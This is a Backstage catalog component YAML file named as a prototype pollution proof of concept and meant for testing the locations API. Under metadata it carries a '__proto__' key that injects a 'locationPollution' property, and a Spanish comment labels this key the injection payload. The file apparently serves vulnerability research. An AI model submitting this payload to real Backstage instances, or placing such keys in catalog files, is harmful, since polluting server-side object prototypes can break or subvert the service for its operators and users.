apiVersion: "backstage.io/v1alpha1"
kind: "Component"
metadata:
  name: "poc-prototype-pollution-2"
  description: "Testing via locations API"
  # Payload de inyección de Prototype Pollution
  "__proto__":
    "locationPollution": "success"
spec:
  type: "service"
  lifecycle: "experimental"
  owner: "guest"